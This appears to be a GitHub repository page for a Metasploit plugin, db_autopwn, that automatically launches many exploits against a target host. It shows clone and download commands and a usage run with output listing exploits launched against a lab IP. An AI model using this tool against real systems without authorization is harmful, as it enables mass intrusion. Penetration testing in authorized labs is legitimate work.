Skip to content

lefarcen/metasploit-db_autopwn

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

metasploit-db_autopwn

metasploit plugin for easy exploit & vulnerability attack.
But, the db_autopwn command is removed from official distribution.

Install

move dB_autopwn.rb file into metasploit plugin directory after clone this repo

git clone https://github.com/hahwul/metasploit-db_autopwn

or

download db_autopwn.rb file in metasploit plugin directory
wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb

Usage

#> msfconsole
MSF > load db_autopwn
[*] Successfully loaded plugin: db_autopwn

MSF > db_autopwn -p -R great -e -q 192.168.56.101 
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] (1/1301 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.56.44:80...
[*] (2/1301 [0 sessions]): Launching exploit/freebsd/http/watchguard_cmd_exec against 192.168.56.44:80...
[*] (3/1301 [0 sessions]): Launching exploit/linux/antivirus/escan_password_exec against 192.168.56.44:80...
[*] (4/1301 [0 sessions]): Launching exploit/linux/http/accellion_fta_getstatus_oauth against 192.168.56.44:80...
[*] (5/1301 [0 sessions]): Launching exploit/linux/http/advantech_switch_bash_env_exec against 192.168.56.44:80...

About

db_autopwn plugin of metasploit

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Ruby 100.0%